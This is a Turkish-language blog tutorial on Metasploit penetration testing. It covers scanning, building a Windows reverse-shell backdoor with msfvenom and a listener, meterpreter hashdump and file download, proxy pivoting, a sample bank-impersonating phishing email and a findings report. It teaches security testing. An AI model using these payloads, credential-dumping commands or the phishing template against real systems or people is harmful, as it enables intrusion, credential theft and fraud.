TR | EN | DE | Our Site

Metasploit Çerçevesi: Uygulamalı Penetrasyon Testi

 Metasploit Çerçevesi: Uygulamalı Penetrasyon Testi 

    Metasploit, siber güvenlik alanında en çok tercih edilen ve güçlü bir araçtır. Sızma testleri ve güvenlik açığı değerlendirmeleri için kullanılan bu açık kaynaklı framework, güvenlik uzmanlarına ve etik hackerlara hedef sistemlerdeki zayıflıkları keşfetme ve istismar etme imkanı sunar. 

1. Penetrasyon Testi Aşamaları

Bir penetrasyon testi genellikle aşağıdaki adımları içerir:
  • Kapsam Belirleme
  • Keşif (Reconnaissance)
  • Keşif (Discovery)
  • İstismar (Exploitation)
  • Sosyal Mühendislik
  • Kontrol Alma
  • Pivotlama
  • Kanıt Toplama
  • Raporlama
  • Düzeltme

Kapsam Belirleme

Penetrasyon testinin ilk adımı, hangi sistemlerin test edileceğini belirlemektir. Bu aşamada, hedef sistemin sınırları, kritik veriler ve hangi hizmetlerin korunması gerektiği netleştirilmelidir. Örneğin, bir finansal kuruluşun müşteri verilerini korumak için hangi sistemlerin kritik olduğunu belirlemek önemlidir.Örnek Senaryo: Bir bankanın IT yöneticisi, dışarıdan yapılacak bir sızma testi için yalnızca müşteri veritabanının bulunduğu sunucunun test edilmesini istemektedir. Bu durumda, testin kapsamı net bir şekilde belirlenmeli ve sınırlandırılmalıdır.

Keşif (Reconnaissance)

Bu aşamada, hedef hakkında mümkün olduğunca fazla bilgi toplanır. Hedef sistemin IP adresleri, çalışan bilgileri ve işletim sistemi gibi detaylar toplanır.Örnek Senaryo: Bir pen tester, LinkedIn üzerinden şirket çalışanlarının profillerini inceleyerek, şirketin yapısı hakkında bilgi toplar. Ayrıca, şirketin web sitesinde yer alan "Hakkımızda" sayfasından yöneticilerin isimlerini öğrenebilir.

Keşif (Discovery)

Bu aşamada, hedef ağ üzerindeki açık portlar ve hizmetler taranır. Nmap gibi araçlar kullanılarak ağdaki cihazlar ve açık portlar tespit edilir.Örnek Komut:
bash
db_nmap -sS -A 192.168.1.0/24
Bu komut, belirtilen IP aralığındaki cihazları tarar ve açık portları listeler. Tarama sonuçları, hangi hizmetlerin çalıştığını ve potansiyel zayıflıkları belirlemek için kullanılabilir.

2. İstismar (Exploitation)

Keşif aşamasından sonra, belirlenen zayıflıkları istismar etmek için uygun exploit'ler seçilir. Metasploit çerçevesinde bulunan exploit modülleri kullanılarak hedef sistemlere saldırılır.

Örnek Senaryo: Windows Backdoor Oluşturma

  1. Terminalde msfvenom kullanarak bir Windows backdoor oluşturun:
    bash
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<saldırgan_ip> LPORT=<saldırgan_port> -f exe -o /root/backdoor.exe
    Bu komut, hedef sisteme ters bağlantı yapacak bir payload oluşturur.
  2. Ardından, Metasploit konsolunu başlatın:
    bash
    msfconsole
  3. Payload'ı dinlemek için gerekli ayarları yapın:
    bash
    use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <saldırgan_ip> set LPORT <saldırgan_port> exploit
  4. Hedefte backdoor çalıştırıldığında, saldırganın sistemine ters bağlantı yapılacaktır.

3. Sosyal Mühendislik

Sosyal mühendislik teknikleri kullanarak hedefin güvenliğini aşmak mümkündür. Phishing e-postaları göndererek kullanıcıların kimlik bilgilerini ele geçirme girişimi yapılabilir.Örnek Senaryo: Bir pen tester, sahte bir e-posta göndererek çalışanlardan şifrelerini güncellemelerini ister. E-posta içeriğinde güvenilir bir kaynaktan geldiği izlenimi yaratmak için bankanın logosu kullanılır ve kullanıcılar sahte bir web sitesine yönlendirilir.

Phishing E-posta Örneği

text
Konu: Acil Şifre Güncellemesi Gerekiyor! Sayın Müşterimiz, Hesabınızın güvenliği için acil olarak şifrenizi güncellemeniz gerekmektedir. Aşağıdaki bağlantıya tıklayarak işlemi gerçekleştirebilirsiniz: [Şifre Güncelleme Bağlantısı] Teşekkürler, Bankanız Güvenlik Ekibi

4. Kontrol Alma

Hedef sisteme erişim sağlandıktan sonra kontrol almak için çeşitli komutlar kullanılabilir. Meterpreter oturumu açıldığında sistem üzerinde işlem yapmak mümkündür.Örnek Komutlar:
bash
meterpreter > sysinfo meterpreter > hashdump
sysinfo komutu ile hedef sistemin bilgileri alınabilirken, hashdump komutu ile kullanıcı parolaları elde edilebilir.

5. Pivotlama

Elde edilen erişim ile diğer ağ segmentlerine geçiş yapmak için pivotlama teknikleri kullanılabilir. Bu sayede daha fazla sisteme erişim sağlanabilir.

Proxy Pivot Örneği

  1. Kompromize edilmiş bir host üzerinden proxy pivot oluşturun:
    bash
    use auxiliary/server/socks4a run
  2. Diğer sistemlere erişim sağlamak için bu proxy üzerinden bağlantılar kurun:
    bash
    proxychains nmap -sS 192.168.2.0/24
Bu sayede yeni ağ segmentlerinde tarama yapabilir ve potansiyel zayıflıkları keşfedebilirsiniz.

6. Kanıt Toplama

Penetrasyon testi sırasında elde edilen veriler ve kanıtlar toplanmalıdır. Bu kanıtlar testin sonuçlarını belgelemek için önemlidir.Örnek: Ekran görüntüleri almak veya dosyaları indirmek için Meterpreter komutları kullanılabilir:
bash
meterpreter > screenshot meterpreter > download /path/to/file
Bu komutlarla elde edilen veriler raporlama aşamasında kullanılacaktır.

7. Raporlama ve Düzeltme

Son olarak, penetrasyon testinin sonuçları detaylı bir rapor halinde sunulmalıdır. Rapor, tespit edilen zayıflıkları ve önerilen düzeltmeleri içermelidir.Rapor İçeriği:
  • Testin kapsamı ve yöntemleri.
  • Elde edilen bulgular.
  • Zayıflıkların ciddiyeti.
  • Düzeltme önerileri.

Rapor Örneği

text
Test Kapsamı: ABC Bankası Müşteri Veritabanı Sunucusu Elde Edilen Bulgular: 1. MS08-067 açığı kullanılarak sisteme erişildi. 2. Kullanıcı parolaları elde edildi. 3. Sistemde güncel olmayan yazılımlar tespit edildi. Düzeltme Önerileri: 1. Tüm yazılımların güncellenmesi. 2. Kullanıcı eğitimlerinin artırılması. 3. Güvenlik duvarı kurallarının gözden geçirilmesi.

Sonuç

Metasploit çerçevesi, penetrasyon testlerinde etkili bir araçtır ve yukarıda belirtilen adımlar ile birlikte kullanıldığında güçlü sonuçlar elde edilebilir. Gerçek dünya senaryolarıyla desteklenen bu örnekler, sızma testi süreçlerini daha iyi anlamanıza yardımcı olacaktır. Unutmayın ki etik hacking prensiplerine uymak her zaman öncelikli olmalıdır!


Yorum Gönder

Daha yeni Daha eski

İletişim Formu